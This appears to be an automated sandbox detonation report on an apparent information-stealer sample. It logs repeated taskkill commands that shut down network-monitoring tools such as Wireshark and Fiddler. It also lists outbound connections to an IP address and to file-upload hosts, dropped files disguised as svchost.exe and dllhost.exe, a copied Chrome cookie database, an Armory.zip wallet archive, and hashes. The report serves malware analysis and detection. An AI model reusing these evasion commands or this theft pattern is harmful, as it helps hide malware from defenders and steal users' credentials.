taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

Network

Country Destination Domain Proto
NL 91.92.241.69:6060 91.92.241.69 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 104.26.13.205:443 api.ipify.org tcp
US 34.117.186.192:443 ipinfo.io tcp
FR 45.112.123.227:443 store1.gofile.io tcp
US 172.67.204.206:443 freeimage.host tcp
NL 91.92.241.69:6060 91.92.241.69 tcp
NL 91.92.241.69:5555 tcp
N/A 127.0.0.1:51014 tcp
US 8.8.8.8:53 tcp
NL 91.92.241.69:6060 91.92.241.69 tcp
US 206.168.191.31:443 store8.gofile.io tcp
US 104.26.13.205:443 api.ipify.org tcp
US 34.117.186.192:443 ipinfo.io tcp
US 206.168.191.31:443 store8.gofile.io tcp
US 172.67.204.206:443 freeimage.host tcp
NL 91.92.241.69:6060 91.92.241.69 tcp
N/A 127.0.0.1:52124 tcp

Files

memory/3648-0-0x0000000073C2E000-0x0000000073C2F000-memory.dmp

memory/3648-1-0x0000000002FA0000-0x0000000002FD6000-memory.dmp

memory/3620-3-0x0000000073C20000-0x00000000743D1000-memory.dmp

C:\Users\Admin\AppData\Roaming\svchost.exe

MD5 fc3b3445be1952e77ce5d224fcc5a6f3
SHA1 009dfcf71939454e115e46ffeaa78b5f30d986b0
SHA256 bffe06bb40efc595fe7756ce4e5a06ff6f1144986bf1a9ab95b7f4f371d0b9b4
SHA512 f435af3f736518d1324564af726217d7b8464752236b1877077d18db3554b0be469082b40401599defead89b87903e347775688f659bff36890cbb3194260522

memory/3648-8-0x0000000005770000-0x0000000005D9A000-memory.dmp

memory/3620-9-0x0000000073C20000-0x00000000743D1000-memory.dmp

memory/3648-10-0x0000000073C20000-0x00000000743D1000-memory.dmp

memory/3620-11-0x0000000073C20000-0x00000000743D1000-memory.dmp

memory/3648-40-0x0000000073C20000-0x00000000743D1000-memory.dmp

C:\Users\Admin\dllhost.exe

MD5 cc7686bf7c7d81f59196d5cc3cab3348
SHA1 ac39079f223f87d404c421c48239f913b12f00a8
SHA256 49c175257966f191a2abce16d8533d359fc27ecf6512da870a9c59937914d5f7
SHA512 940cfb37c1f5e5dbd86cc14d5a0a85dfaf889754051d4fc0d0afbe7bedceaec91b5f36b873b5e24cd081432db1b7d61df72a198681b9ab8e3a9b57197cfb58ae

memory/2436-45-0x0000000000290000-0x00000000002A8000-memory.dmp

memory/3620-52-0x0000000005810000-0x0000000005876000-memory.dmp

memory/3620-51-0x00000000050B0000-0x0000000005116000-memory.dmp

memory/3648-61-0x0000000006060000-0x00000000063B7000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE

MD5 d9b578176058e284fa7a5026ff28349c
SHA1 584c269a881599b00864a906335bbe42c08ee114
SHA256 f9eeba32c6d22897d7d04a8a60ee99d62e576facc8d6048828783d54d430a031
SHA512 3042c279663ef29c0d0bb6fb7e56b6646dc75eb1819cfc1f3b6b73e4e68763e32c70e0cc7b507490b535478d482226407676e9803d5c8f5acc7c7354e4689d18

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k2q1np22.yti.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3620-50-0x0000000005010000-0x0000000005032000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI47242\python311.dll

MD5 b8769a867abc02bfdd8637bea508cab2
SHA1 782f5fb799328c001bca77643e31fb7824f9d8cc
SHA256 9cf39945840ee8d769e47ffdb554044550b5843b29c68fa3849ba9376c3a7ec8
SHA512 bf01e343877a92d458373c02a9d64426118915ade324cf12d6ff200970da641358e8f362732cd9a8508845e367313c9bab2772d59a9ae8d934cd0dd7d28535b3

C:\Users\Admin\AppData\Local\Temp\_MEI47242\VCRUNTIME140.dll

MD5 1e6e97d60d411a2dee8964d3d05adb15
SHA1 0a2fe6ec6b6675c44998c282dbb1cd8787612faf
SHA256 8598940e498271b542f2c04998626aa680f2172d0ff4f8dbd4ffec1a196540f9
SHA512 3f7d79079c57786051a2f7facfb1046188049e831f12b549609a8f152664678ee35ad54d1fff4447428b6f76bea1c7ca88fa96aab395a560c6ec598344fcc7fa

C:\Users\Admin\AppData\Local\Temp\_MEI47242\base_library.zip

MD5 83d235e1f5b0ee5b0282b5ab7244f6c4
SHA1 629a1ce71314d7abbce96674a1ddf9f38c4a5e9c
SHA256 db389a9e14bfac6ee5cce17d41f9637d3ff8b702cc74102db8643e78659670a0
SHA512 77364aff24cfc75ee32e50973b7d589b4a896d634305d965ecbc31a9e0097e270499dbec93126092eb11f3f1ad97692db6ca5927d3d02f3d053336d6267d7e5f

memory/3620-174-0x0000000005EB0000-0x0000000005ECE000-memory.dmp

memory/3620-179-0x0000000006490000-0x00000000064DC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI47242\_ssl.pyd

MD5 77da1e6ad0cbb474cb2714c6b09f661a
SHA1 da3946b0d6e56e7f416b96fce4c5b9f870747149
SHA256 fd6879eaadbc75a2a989568a1e6781cca9bb08508aed796b7fdea3f80aeae26a
SHA512 8fc31fd23fc42cb7e53faad8adfe3314ced71af4aae5bc2dcce91939365957f1052ebe054d0d02f4adb504e456e88465d4a79cf7acd7d0aab7617d652a06b749

C:\Users\Admin\AppData\Local\Temp\_MEI47242\_socket.pyd

MD5 b55ce33c6ba6d7af221f3d8b1a30a6f7
SHA1 b8696ed5b7a52c9bfda5c1ea4bd43a9ecc17fed0
SHA256 ec5817b46539f9a5cbf1525cf7c714bc0e9f5a918fc4b963dec9c301b86c7d1f
SHA512 4d15d90dd2bacc8c9537533b1267455fbc030e38546c1f6f4eb7dabe690c744471bd45c079f0c711b9eca330f1a413ea37fc6b08810854d5f51b69b19e991462

C:\Users\Admin\AppData\Local\Temp\_MEI47242\libcrypto-1_1.dll

MD5 90311ea0cc27e27d2998969c57eba038
SHA1 4653f1261fb7b16bc64c72833cfb93f0662d6f6d
SHA256 239d518dd67d8c2bbf6aeaded86ed464865e914db6bf3b115973d525ebd7d367
SHA512 6e2f839fb8d7aaab0b51778670da104c36355e22991eae930d2eaecabab45b40fda5e2317f1c928a803146855ac5553e4e464a65213696311c206bec926775d8

C:\Users\Admin\AppData\Local\Temp\_MEI47242\charset_normalizer\md.cp311-win32.pyd

MD5 5242622c9818ff5572c08d3f9f96ea07
SHA1 f4c53ef8930a2975335182ad9b6c6a2ab3851362
SHA256 85f6e0b522d54459e7d24746054d26ba35ea4cc8505a3dd74a2bf5590f9f40fc
SHA512 c2ef2a5632eb42b00756bee9ffb00e382cbc1b0c6578243f3f1fe48eff18a1033187a5d7bf8bda4d9cf8d6cb4131ca37c47d8238ff264e1b1c496b16740b79a7

C:\Users\Admin\AppData\Local\Temp\_MEI47242\_lzma.pyd

MD5 b4251ed45538a2a7d79737db8fb139db
SHA1 cded1a4637e7e18684d89cd34c73cfae424183e6
SHA256 caad390c4c3c6b1e50a33754a0af7d2c3f4b1245c8ead79ff7f7be0e5654e210
SHA512 d40f7de85c8dbb3e16135e1f8d8ce829cb681eaab49c6f4c40792fa8f733743df70cfa7c6224e06bff68214069f90cd960970ac47d0348e9827a2136789c43c1

C:\Users\Admin\AppData\Local\Temp\_MEI47242\_bz2.pyd

MD5 f73ea2b834471fb01d491a65caa1eea3
SHA1 00e888645e0a1638c639a2c21df04a3baa4c640a
SHA256 8633e8ad7172b095ed7ba40fa1039a64b04b20e6f42ac428e103d0c793831bda
SHA512 b8329b33d78458c2ac7979a5c5a19bd37ea9a473682d23faf54e77cfc5edadc0426490add9864e99a719ac5b4a57c5326ed82496adf80afd1876577caa608418

C:\Users\Admin\AppData\Local\Temp\_MEI47242\charset_normalizer\md__mypyc.cp311-win32.pyd

MD5 ca6309d94f4136c058a244044c890d89
SHA1 49424c3eba17a4675a469326b6a5f10f6c14ba88
SHA256 b65e4644d0cdc01f5076fe9b7548ffd047ae143087b8ab3cbe0a1dc24fdbf00d
SHA512 ec2329db2378350ec27d742ed649df3fb81b1b2dfb24ed4cd8c274852742809c571f28a960f8907f04ec515c1960c2111880fbeecacfd04dea439a4d116f225b

C:\Users\Admin\AppData\Local\Temp\_MEI47242\unicodedata.pyd

MD5 b98d5dd9980b29ce394675dc757509b8
SHA1 7a3ad4947458baa61de998bc8fde1ef736a3a26c
SHA256 1498105d00434a5ebbaa6bee2e5f5677c34a948b2073d789f4d4b5968a4c8aaf
SHA512 ba7e52deaf88aab062646d6a70f9e15016fcbdcf55a4f16d8c73ea6a63ad591eb3b623514a9fecc03188b1d1eb55a6b168da55bb035dc7d605cae53def2b65f2

C:\Users\Admin\AppData\Local\Temp\_MEI47242\_queue.pyd

MD5 48f98bbd96f2b179f9b62a634f2353ba
SHA1 24a374e9aebdefb6f02c4fad06502f9d13d000dd
SHA256 dee6f87c1cb0ee904e4a2189e04a2931d33e36db9e09312c96bc34f317a30bfd
SHA512 3980ef687c9050bef2ce08f6f2a497bd29bf51a7be45e275bf9f77987e1fbe1319888fc0c163d91ab9b805d42c8457bad792eea6ca62a8fd1503e8d2cdf58503

C:\Users\Admin\AppData\Local\Temp\_MEI47242\_hashlib.pyd

MD5 303a1d7d21ca6e625950a966d17f86be
SHA1 660aaad68207dc0a4d757307ad57e86b120f2d91
SHA256 53180306bad339e76cc427009db15f124f49d4c879676258264365a7e2ed703f
SHA512 99036d59cad6f286e8f901acadcc7db192bb385699228b1b34907ea49fb5ff07b636550c04f0d4b70f161a26ea2e58794d9080d69d053ada08d2ad9bd3f861df

C:\Users\Admin\AppData\Local\Temp\_MEI47242\libssl-1_1.dll

MD5 0eb0295658ac5ce82b2d96d330d2866e
SHA1 68894ff86e0b443502e3ba9ce06bfb1660d19204
SHA256 52224881670ced6419a3e68731e5e3d0b1d224d5816619dccf6161f91ec78021
SHA512 347b7b5d7b9b1c88ea642f92257f955c0202ae16d6764f82d9923c96c151f1e944abf968f1e5728bde0dae382026b5279e4bcbe24c347134a1fbe1cb0b2e090f

C:\Users\Admin\AppData\Local\Temp\_MEI47242\select.pyd

MD5 aae48cf580702fec3a79524d1721305c
SHA1 33f68231ff3e82adc90c3c9589d5cc918ad9c936
SHA256 93b2b54c80d03ff7ade5fe4cd03baed8c5b5a8e1edcd695a53bae2e369006265
SHA512 1c826364015684bb3fb36ce1fcb608da88f4c74b0eec6b53f4ca07b5ea99fee8b4e318c1570ce358cefd6b7bdf21b046b1375c3d687f6d0d08bf7b955568a1c6

C:\Users\Admin\AppData\Local\Temp\_MEI47242\_decimal.pyd

MD5 bcdbf3a04a8bfd8c8a9624996735fc1a
SHA1 08d35c136fe5c779b67f56ae7165b394d5c8d8ef
SHA256 1f6db9be716626f6803cefd646fbbc478878c6acce597d9f6c5776dc7b69d3c7
SHA512 d22195c0a0535f7986d0a6d0bb820d36c8824a0b15378cb5d5ab0f334064896e0d64ed880d706f80e0b96d022631fc6b4fcc47371ca1d5cdd2c37dd75c62274b

C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\python310.dll

MD5 384349987b60775d6fc3a6d202c3e1bd
SHA1 701cb80c55f859ad4a31c53aa744a00d61e467e5
SHA256 f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8
SHA512 6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5

C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\VCRUNTIME140.dll

MD5 11d9ac94e8cb17bd23dea89f8e757f18
SHA1 d4fb80a512486821ad320c4fd67abcae63005158
SHA256 e1d6f78a72836ea120bd27a33ae89cbdc3f3ca7d9d0231aaa3aac91996d2fa4e
SHA512 aa6afd6bea27f554e3646152d8c4f96f7bcaaa4933f8b7c04346e410f93f23cfa6d29362fd5d51ccbb8b6223e094cd89e351f072ad0517553703f5bf9de28778

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libcrypto-1_1.dll

MD5 63c4f445b6998e63a1414f5765c18217
SHA1 8c1ac1b4290b122e62f706f7434517077974f40e
SHA256 664c3e52f914e351bb8a66ce2465ee0d40acab1d2a6b3167ae6acf6f1d1724d2
SHA512 aa7bdb3c5bc8aeefbad70d785f2468acbb88ef6e6cac175da765647030734453a2836f9658dc7ce33f6fff0de85cb701c825ef5c04018d79fa1953c8ef946afd

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libssl-1_1.dll

MD5 bd857f444ebbf147a8fcd1215efe79fc
SHA1 1550e0d241c27f41c63f197b1bd669591a20c15b
SHA256 b7c0e42c1a60a2a062b899c8d4ebd0c50ef956177ba21785ce07c517c143aeaf
SHA512 2b85c1521edeadf7e118610d6546fafbbad43c288a7f0f9d38d97c4423a541dfac686634cde956812916830fbb4aad8351a23d95cd490c4a5c0f628244d30f0a

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_queue.pyd

MD5 c9ee37e9f3bffd296ade10a27c7e5b50
SHA1 b7eee121b2918b6c0997d4889cff13025af4f676
SHA256 9ecec72c5fe3c83c122043cad8ceb80d239d99d03b8ea665490bbced183ce42a
SHA512 c63bb1b5d84d027439af29c4827fa801df3a2f3d5854c7c79789cad3f5f7561eb2a7406c6f599d2ac553bc31969dc3fa9eef8648bed7282fbc5dc3fb3ba4307f

C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\charset_normalizer\md.pyd

MD5 f33ca57d413e6b5313272fa54dbc8baa
SHA1 4e0cabe7d38fe8d649a0a497ed18d4d1ca5f4c44
SHA256 9b3d70922dcfaeb02812afa9030a40433b9d2b58bcf088781f9ab68a74d20664
SHA512 f17c06f4202b6edbb66660d68ff938d4f75b411f9fab48636c3575e42abaab6464d66cb57bce7f84e8e2b5755b6ef757a820a50c13dd5f85faa63cd553d3ff32

C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\_hashlib.pyd

MD5 cfb9e0a73a6c9d6d35c2594e52e15234
SHA1 b86042c96f2ce6d8a239b7d426f298a23df8b3b9
SHA256 50daeb3985302a8d85ce8167b0bf08b9da43e7d51ceae50e8e1cdfb0edf218c6
SHA512 22a5fd139d88c0eee7241c5597d8dbbf2b78841565d0ed0df62383ab50fde04b13a203bddef03530f8609f5117869ed06894a572f7655224285823385d7492d2

memory/3648-1185-0x0000000007640000-0x000000000765E000-memory.dmp

memory/3648-1176-0x00000000758B0000-0x00000000758FC000-memory.dmp

memory/3648-1186-0x0000000007660000-0x0000000007704000-memory.dmp

memory/3648-1175-0x0000000006A20000-0x0000000006A54000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\_ssl.pyd

MD5 11c5008e0ba2caa8adf7452f0aaafd1e
SHA1 764b33b749e3da9e716b8a853b63b2f7711fcc7c
SHA256 bf63f44951f14c9d0c890415d013276498d6d59e53811bbe2fa16825710bea14
SHA512 fceb022d8694bce6504d6b64de4596e2b8252fc2427ee66300e37bcff297579cc7d32a8cb8f847408eaa716cb053e20d53e93fbd945e3f60d58214e6a969c9dd

C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\select.pyd

MD5 78d421a4e6b06b5561c45b9a5c6f86b1
SHA1 c70747d3f2d26a92a0fe0b353f1d1d01693929ac
SHA256 f1694ce82da997faa89a9d22d469bfc94abb0f2063a69ec9b953bc085c2cb823
SHA512 83e02963c9726a40cd4608b69b4cdf697e41c9eedfb2d48f3c02c91500e212e7e0ab03e6b3f70f42e16e734e572593f27b016b901c8aa75f674b6e0fbb735012

C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\_socket.pyd

MD5 5dd51579fa9b6a06336854889562bec0
SHA1 99c0ed0a15ed450279b01d95b75c162628c9be1d
SHA256 3669e56e99ae3a944fbe7845f0be05aea96a603717e883d56a27dc356f8c2f2c
SHA512 7aa6c6587890ae8c3f9a5e97ebde689243ac5b9abb9b1e887f29c53eef99a53e4b4ec100c03e1c043e2f0d330e7af444c3ca886c9a5e338c2ea42aaacae09f3e

C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\_lzma.pyd

MD5 5a77a1e70e054431236adb9e46f40582
SHA1 be4a8d1618d3ad11cfdb6a366625b37c27f4611a
SHA256 f125a885c10e1be4b12d988d6c19128890e7add75baa935fe1354721aa2dea3e
SHA512 3c14297a1400a93d1a01c7f8b4463bfd6be062ec08daaf5eb7fcbcde7f4fa40ae06e016ff0de16cb03b987c263876f2f437705adc66244d3ee58f23d6bf7f635

C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\_bz2.pyd

MD5 b45e82a398713163216984f2feba88f6
SHA1 eaaf4b91db6f67d7c57c2711f4e968ce0fe5d839
SHA256 4c2649dc69a8874b91646723aacb84c565efeaa4277c46392055bca9a10497a8
SHA512 b9c4f22dc4b52815c407ab94d18a7f2e1e4f2250aecdb2e75119150e69b006ed69f3000622ec63eabcf0886b7f56ffdb154e0bf57d8f7f45c3b1dd5c18b84ec8

C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe

MD5 ccecc6473a3eaa0bf82ad48ca195bf63
SHA1 82d2fc3001f25e702266b7d80204fdf11c901dad
SHA256 a9e4d1bcba426a4cface132f03823c180ccc5389ae45c31d781cba02627535d9
SHA512 66266b93cf926f0d4539f9a311b758b4d494154e771d648769e46fe42abe12df61506da0176f333d426b2ab5f0a44faa66a994d351c6b4713703ef2b817d0260

memory/3620-1188-0x00000000063A0000-0x00000000063BA000-memory.dmp

memory/3648-1187-0x0000000007DF0000-0x000000000846A000-memory.dmp

memory/3648-1189-0x0000000007840000-0x000000000784A000-memory.dmp

memory/3648-1190-0x0000000007A40000-0x0000000007AD6000-memory.dmp

memory/3648-1191-0x00000000079C0000-0x00000000079D1000-memory.dmp

memory/3620-1192-0x0000000008120000-0x00000000086C6000-memory.dmp

memory/3648-1193-0x0000000007A00000-0x0000000007A0E000-memory.dmp

memory/3620-1194-0x00000000072B0000-0x0000000007342000-memory.dmp

memory/3648-1195-0x0000000007A10000-0x0000000007A25000-memory.dmp

memory/3648-1196-0x0000000007B00000-0x0000000007B1A000-memory.dmp

memory/2976-1205-0x00000299B0AB0000-0x00000299B0AD2000-memory.dmp

memory/3648-1206-0x0000000007B30000-0x0000000007B38000-memory.dmp

memory/2976-1209-0x00000299B0C80000-0x00000299B0DCF000-memory.dmp

memory/3648-1212-0x0000000073C20000-0x00000000743D1000-memory.dmp

memory/796-1222-0x0000029034490000-0x00000290345DF000-memory.dmp

memory/4636-1232-0x000001F129BD0000-0x000001F129D1F000-memory.dmp

memory/3100-1253-0x0000020B9CC00000-0x0000020B9CD4F000-memory.dmp

memory/3620-1259-0x0000000073C20000-0x00000000743D1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\jlesyw.exe

MD5 b929c16a5b60e694e3f599fe4fc2ea29
SHA1 5fbe6f72d2fc93b387d9eda0d0513112650186c6
SHA256 78d6ea11fd0390935c366f949154d7fa1aec29ee9b796f373916a7f17d382776
SHA512 43889b5f1acdda0722f5925fec74d68c47837f8d1b8a1f320d0292e36c9dc9a16da19e34caa71fbc17207e46dd4a7763e163b82ef6862a1ffa11204b2bbd8060

memory/4684-2346-0x0000012C24DD0000-0x0000012C24F1F000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\temp_cookies.sqlite

MD5 58d98cd8f911d63a182a550671d6e35e
SHA1 2d105d9b511c375591122836751376ae3a340200
SHA256 296a95c878da37b9fa8da75966940858ea4f9e675334615a75f4b8de3a832ca0
SHA512 de5526c55bec9414fdc4c9eaf466eb47f1cddd3867f98c68327bb5e0d6a4b9767732323abcd89186f75b3f6ceeae263399caf3f63ed696d63c1215330c83e874

C:\Users\Admin\AppData\Roaming\Armory.zip

MD5 76cdb2bad9582d23c1f6f4d868218d6c
SHA1 b04f3ee8f5e43fa3b162981b50bb72fe1acabb33
SHA256 8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85
SHA512 5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

MD5 e0236413295e49948baeeb46d884acef
SHA1 c24f80184264ef596722c1a84b8dedde9bdad557
SHA256 11af5d1895a6e5952ebf08f72ad5121d828a5e2f8dc0656875d527e886ca54e8
SHA512 d99fd945c37dee141ea4e4f2e2460f482230bb679d8a63131348685a7dbebce074c9543161672fc525cd0c84d41d29e2ee78f6e3a7b8f7d18ca40eefcb95e5c6

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

MD5 870b0b2057b02c012ae660a60a8cf3a8
SHA1 de36df30678ecf716189eb86179904bfbf9c11bc
SHA256 a143251cd1964f2b8cb7921b647b49e5d95f9a93bd7af1bc338335600df8a1b1
SHA512 b2fb5741233398b049eea5a561c2e8af478957a4b2e189fcd3b738cd610c8778428ffb9c1bcaf382a334255fe090ad6b6c1b4e0e51e1495cc22390f890221ec9

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-22 02:18

Reported

2024-06-22 02:21

Platform

win11-20240508-en

Max time kernel

89s

Max time network

94s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Tango Release\assets.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Tango Release\assets.dll",#1

Network

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-22 02:18

Reported

2024-06-22 02:21

Platform

win11-20240508-en

Max time kernel

118s

Max time network

132s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\Tango Release\instructions.txt"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5068 wrote to memory of 2824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\NOTEPAD.EXE
PID 5068 wrote to memory of 2824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\NOTEPAD.EXE

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Tango Release\instructions.txt"

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Tango Release\instructions.txt

Network

Country Destination Domain Proto
US 52.111.229.43:443 tcp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-06-22 02:18

Reported

2024-06-22 02:21

Platform

win11-20240611-en

Max time kernel

91s

Max time network

97s

